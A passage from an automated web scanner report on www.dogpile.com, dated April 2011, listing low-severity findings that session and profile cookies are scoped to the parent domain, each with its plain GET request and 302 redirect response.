Path:	/dogpile_rss/ws/privacy/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=7d43bcdc3ae442d4896bc16a3af0cb01&ActionId=72ca3c5c3a5c40f5b00cc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:59 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:59 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:59 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/privacy/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.66. http://www.dogpile.com/dogpile_rss/ws/redir/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=ad3543f0276b4b60a6f1c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:47 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:47 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:47 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/redir/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_rss/ws/index/qcat=Web/qcoll=Relevance/rfcid=0/rfcp=0/padv=/_iceUrlFlag=11?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=ad3543f0276b4b60a6f1c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:47 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:47 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:47 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:46 GMT
Connection: close
Content-Length: 234

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_rss/ws/index/qcat=Web/qcoll=Relevance/rfcid=0/rfcp=0/padv=/_iceUrlFlag=11?_IceUrl=true
...[SNIP]...

6.67. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Bowl/qlnk=1/rfcp=RightNav/rfcid=302361/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Bowl/qlnk=1/rfcp=RightNav/rfcid=302361/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=2d6f022260dd4c51b0a9c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:39 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:39 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:39 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Bowl/qlnk=1/rfcp=RightNav/rfcid=302361/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_rss/ws/results/Web/Go%20Daddy%20Bowl/1/302361/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=2d6f022260dd4c51b0a9c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:39 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:39 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:39 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:38 GMT
Connection: close
Content-Length: 263

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_rss/ws/results/Web/Go%20Daddy%20Bowl/1/302361/RightNav/Relevance/iq=true/zoom=off/qlnk
...[SNIP]...

6.68. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Com/qlnk=1/rfcp=RightNav/rfcid=302363/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Com/qlnk=1/rfcp=RightNav/rfcid=302363/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=ac9d5b1703fc46f1a597c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:27 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:27 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:27 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Com/qlnk=1/rfcp=RightNav/rfcid=302363/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_rss/ws/results/Web/Go%20Daddy%20Com/1/302363/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=ac9d5b1703fc46f1a597c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:27 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:27 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:26 GMT
Connection: close
Content-Length: 262

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_rss/ws/results/Web/Go%20Daddy%20Com/1/302363/RightNav/Relevance/iq=true/zoom=off/qlnk=
...[SNIP]...

6.69. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Email%20Login/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Email%20Login/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=61f30d71ade94af38defc16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:13 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:13 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:13 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Email%20Login/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_rss/ws/results/Web/Go%20Daddy%20Email%20Login/1/302357/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=61f30d71ade94af38defc16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:13 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:13 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:12 GMT
Connection: close
Content-Length: 272

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_rss/ws/results/Web/Go%20Daddy%20Email%20Login/1/302357/RightNav/Relevance/iq=true/zoom
...[SNIP]...

6.70. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Email/qlnk=1/rfcp=RightNav/rfcid=302364/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Email/qlnk=1/rfcp=RightNav/rfcid=302364/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=b2e5bc5af4a743d08706c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:41 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:41 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:41 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Email/qlnk=1/rfcp=RightNav/rfcid=302364/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_rss/ws/results/Web/Go%20Daddy%20Email/1/302364/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=b2e5bc5af4a743d08706c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:41 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:41 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:41 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:41 GMT
Connection: close
Content-Length: 264

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_rss/ws/results/Web/Go%20Daddy%20Email/1/302364/RightNav/Relevance/iq=true/zoom=off/qln
...[SNIP]...

6.71. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Log%20In/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Log%20In/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=3e765be57518437a8a99c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:39 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:39 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:39 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Log%20In/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_rss/ws/results/Web/Go%20Daddy%20Log%20In/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=3e765be57518437a8a99c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:39 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:39 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:39 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:38 GMT
Connection: close
Content-Length: 267

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_rss/ws/results/Web/Go%20Daddy%20Log%20In/1/302362/RightNav/Relevance/iq=true/zoom=off/
...[SNIP]...

6.72. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Video/qlnk=1/rfcp=RightNav/rfcid=302359/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Video/qlnk=1/rfcp=RightNav/rfcid=302359/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=aceda43fda544d5f8fabc16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:34 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:34 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:34 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Video/qlnk=1/rfcp=RightNav/rfcid=302359/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_rss/ws/results/Web/Go%20Daddy%20Video/1/302359/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=aceda43fda544d5f8fabc16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:34 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:34 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:34 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:33 GMT
Connection: close
Content-Length: 264

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_rss/ws/results/Web/Go%20Daddy%20Video/1/302359/RightNav/Relevance/iq=true/zoom=off/qln
...[SNIP]...

6.73. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Videos%20Full/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Videos%20Full/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=53c34b6941924341b760c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:36 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:36 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:36 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Videos%20Full/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_rss/ws/results/Web/Go%20Daddy%20Videos%20Full/1/302360/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=53c34b6941924341b760c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:36 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:36 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:36 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:36 GMT
Connection: close
Content-Length: 272

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_rss/ws/results/Web/Go%20Daddy%20Videos%20Full/1/302360/RightNav/Relevance/iq=true/zoom
...[SNIP]...

6.74. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy/qlnk=1/rfcp=RightNav/rfcid=302358/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy/qlnk=1/rfcp=RightNav/rfcid=302358/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=7ff1b4e7dcb14d578494c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:27 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:27 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:27 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy/qlnk=1/rfcp=RightNav/rfcid=302358/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Redirect
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: http://www.dogpile.com/dogpile_other/ws/index
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=7ff1b4e7dcb14d578494c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:27 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:27 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:27 GMT
Connection: close
Content-Length: 168

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.dogpile.com/dogpile_other/ws/index">here</a></body>

6.75. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=MLB%20Schedule/adv=/rfcp=RightNav/rfcid=107/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=MLB%20Schedule/adv=/rfcp=RightNav/rfcid=107/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=8426efacdea344309ef3c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:43 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:43 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:43 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=MLB%20Schedule/adv=/rfcp=RightNav/rfcid=107/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_rss/ws/results/Web/MLB%20Schedule/1/107/RightNav/Relevance/iq=true/zoom=off/_iceUrlFlag=7?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=8426efacdea344309ef3c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:43 GMT; path=/
